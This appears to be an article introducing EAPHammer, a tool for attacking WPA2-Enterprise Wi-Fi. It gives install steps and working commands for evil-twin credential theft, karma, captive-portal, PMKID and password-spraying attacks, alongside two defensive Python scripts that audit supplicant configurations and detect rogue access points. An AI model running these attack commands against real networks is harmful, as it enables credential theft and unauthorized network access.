EAPHammer is a tool that was developed to test the security of WPA2-Enterprise networks. It was created by Gabriel Ryan (s0lst1c3) and is designed to exploit vulnerabilities in the Extensible Authentication Protocol (EAP), commonly used in enterprise Wi-Fi networks.
WPA2-Enterprise is a security protocol that provides more robust authentication and encryption mechanisms than the standard WPA2 used in home and small office networks. It relies on a RADIUS server for authentication, and EAP is the protocol used for communication between the client and the server.
Features
- Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
- Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
- Perform captive portal attacks
- Built-in Responder integration
- Support for Open networks and WPA-EAP/WPA2-EAP
- No manual configuration is necessary for most attacks.
- No manual configuration necessary for installation and setup process
- Leverages latest version of hostapd (2.8)
- Support for evil twin and karma attacks
- Generate timed Powershell payloads for indirect wireless pivots
- Integrated HTTP server for Hostile Portal attacks
- Support for SSID cloaking
- Fast and automated PMKID attacks against PSK networks using hcxtools
- Password spraying across multiple usernames against a single ESSID
EAPHammer leverages a technique called “EAP Downgrade Attack” to force clients to use weaker EAP methods, such as EAP-MD5 or EAP-LEAP, instead of the more secure EAP methods like EAP-TLS or PEAP. By downgrading the authentication method, the attacker can then attempt to exploit vulnerabilities in the weaker EAP methods to gain unauthorized access to the network.
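The client-side counterpart to the downgrade described above is a supplicant that refuses weak methods and validates the RADIUS server certificate. The following audit script is an added example and is not part of EAPHammer; it parses wpa_supplicant-style network blocks (the constructed SAMPLE_CONF below, with one hardened and one weak block) and flags the settings that would let a rogue access point negotiate EAP-MD5/LEAP or present an arbitrary server certificate. The configuration keys checked (ca_cert, ca_path, domain_suffix_match, domain_match, phase2) are real wpa_supplicant options; the sample SSIDs, identities and paths are constructed.

```python
import re

# Constructed sample wpa_supplicant.conf: the first block validates the
# server and pins the inner method, the second would accept any RADIUS
# server and still lists the weak EAP methods named in the text.
SAMPLE_CONF = """
network={
    ssid="CompanyXYZ"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="example-only"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.companyxyz.example"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="OffWifi"
    key_mgmt=WPA-EAP
    eap=PEAP LEAP MD5
    identity="bob"
    password="example-only"
    phase2="auth=MSCHAPV2 auth=GTC"
}
"""

# Methods the text calls out as downgrade targets.
WEAK_EAP = {"MD5", "LEAP"}

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)


def parse_networks(conf):
    """Return one dict of key -> value per network={...} block."""
    nets = []
    for body in BLOCK_RE.findall(conf):
        fields = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip().strip('"')
        nets.append(fields)
    return nets


def audit_network(net):
    """List the ways this block could be coaxed into a weak EAP exchange."""
    findings = []
    if "WPA-EAP" not in net.get("key_mgmt", "").split():
        return findings  # PSK/open blocks are out of scope for this check
    weak = sorted(set(net.get("eap", "").split()) & WEAK_EAP)
    if weak:
        findings.append("weak EAP methods enabled: " + ", ".join(weak))
    if not (net.get("ca_cert") or net.get("ca_path")):
        findings.append("no ca_cert/ca_path: RADIUS server certificate is not validated")
    if not (net.get("domain_suffix_match") or net.get("domain_match")):
        findings.append("no domain_suffix_match/domain_match: any certificate "
                        "from the trusted CA is accepted as the RADIUS server")
    if "auth=GTC" in net.get("phase2", ""):
        findings.append("phase2 allows GTC, which carries the password in "
                        "cleartext inside the TLS tunnel")
    return findings


def audit_conf(conf):
    """Map each SSID in the config to its list of findings (empty = hardened)."""
    return {net.get("ssid", "?"): audit_network(net) for net in parse_networks(conf)}


if __name__ == "__main__":
    for ssid, findings in audit_conf(SAMPLE_CONF).items():
        print(ssid, "OK" if not findings else "")
        for f in findings:
            print("   -", f)
```

A block that produces no findings pins a single strong outer method, trusts only the corporate CA, checks the server name in the certificate, and limits the inner method to MSCHAPv2, which is what stops an evil twin from talking the client down to MD5, LEAP or a cleartext inner method.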
How to Install EAPHammer
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
Then run only the setup script that matches your distribution:
./kali-setup
./parrot-setup
./raspbian-setup
Generate EAPHammer Certificates
./eaphammer --cert-wizard
Steal RADIUS Credentials (Evil Twin)
./eaphammer -i wlan0 --channel 5 --auth wpa-eap --essid OffWifi --creds
Karma attacks
./eaphammer -i wlan0 --essid offwifi --cloaking full -c 7 --auth open --hostile-portal --karma
PMKID Attacks
./eaphammer --pmkid --interface wlan0 --bssid fc:ad:83:77:fe:ab --channel 10
ESSID Cloaking
./eaphammer -i wlan0 -e CompanyXYZ -c 1 --auth open --hostile-portal --cloaking full
Captive Portal Attacks
./eaphammer --bssid fc:ad:83:77:fe:ab --essid CompanyXYZ --channel 149 --interface wlan0 --captive-portal
Password Spraying
./eaphammer --eap-spray --interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 --essid CompanyXYZ --password qwerty1234 --user-list users.txt
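The evil twin, karma and hostile portal invocations above all show up the same way on the air: a BSSID that is not in the corporate inventory advertising the corporate ESSID (possibly as an open network), or a single BSSID answering to many unrelated ESSIDs. The detector below is an added example, not EAPHammer code, that runs that check over constructed scan records in the shape a wireless sensor might log (bssid, essid, channel, auth); the BSSIDs, ESSIDs, the AUTHORIZED inventory and the karma threshold are all constructed for the example.

```python
from collections import defaultdict

# Constructed scan records: (bssid, essid, channel, auth).
OBSERVATIONS = [
    ("00:11:22:33:44:01", "CompanyXYZ", 1,   "WPA2-EAP"),  # legitimate corporate AP
    ("00:11:22:33:44:02", "CompanyXYZ", 6,   "WPA2-EAP"),  # legitimate corporate AP
    ("de:ad:be:ef:00:01", "CompanyXYZ", 149, "WPA2-EAP"),  # unknown BSSID cloning the ESSID
    ("de:ad:be:ef:00:01", "CompanyXYZ", 149, "OPEN"),      # same BSSID, open/hostile-portal style
    ("aa:bb:cc:dd:ee:ff", "CoffeeShop", 7,   "OPEN"),      # one BSSID answering many ESSIDs
    ("aa:bb:cc:dd:ee:ff", "HomeNet",    7,   "OPEN"),
    ("aa:bb:cc:dd:ee:ff", "Airport",    7,   "OPEN"),
    ("aa:bb:cc:dd:ee:ff", "GuestWifi",  7,   "OPEN"),
]

# Hypothetical inventory of corporate BSSIDs and the ESSIDs they serve.
AUTHORIZED = {"00:11:22:33:44:01", "00:11:22:33:44:02"}
CORP_ESSIDS = {"CompanyXYZ"}
# A BSSID answering to this many distinct ESSIDs is treated as karma-style behaviour.
KARMA_ESSID_THRESHOLD = 3


def detect_rogues(observations, authorized=AUTHORIZED, corp_essids=CORP_ESSIDS,
                  karma_threshold=KARMA_ESSID_THRESHOLD):
    """Return (kind, bssid, detail) alerts for evil-twin and karma indicators."""
    alerts = []
    essids_by_bssid = defaultdict(set)
    reported = set()
    for bssid, essid, channel, auth in observations:
        essids_by_bssid[bssid].add(essid)
        # Corporate ESSID from a BSSID we do not own: evil twin, reported once
        # per (bssid, essid, auth) so the open and WPA2-EAP variants both surface.
        if essid in corp_essids and bssid not in authorized:
            key = (bssid, essid, auth)
            if key not in reported:
                reported.add(key)
                alerts.append(("evil_twin", bssid,
                               f"{essid} advertised by unknown BSSID on channel {channel} ({auth})"))
    # One radio claiming to be every network clients probe for.
    for bssid, essids in essids_by_bssid.items():
        if len(essids) >= karma_threshold:
            alerts.append(("karma", bssid,
                           f"responds to {len(essids)} distinct ESSIDs: {', '.join(sorted(essids))}"))
    return alerts


if __name__ == "__main__":
    for kind, bssid, detail in detect_rogues(OBSERVATIONS):
        print(f"[{kind}] {bssid}: {detail}")
```

Cloaked ESSIDs (the --cloaking full runs above) do not appear in beacons, so a sensor that only reads beacons will miss them; feeding probe responses into the same records, with the ESSID the rogue answered with, is what makes the karma rule fire.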
GitHub: https://github.com/s0lst1c3/eaphammer
It’s important to note that EAPHammer is an offensive security tool and should only be used in authorized and controlled environments for legitimate security testing purposes. Using it to attack networks without proper authorization is illegal and unethical.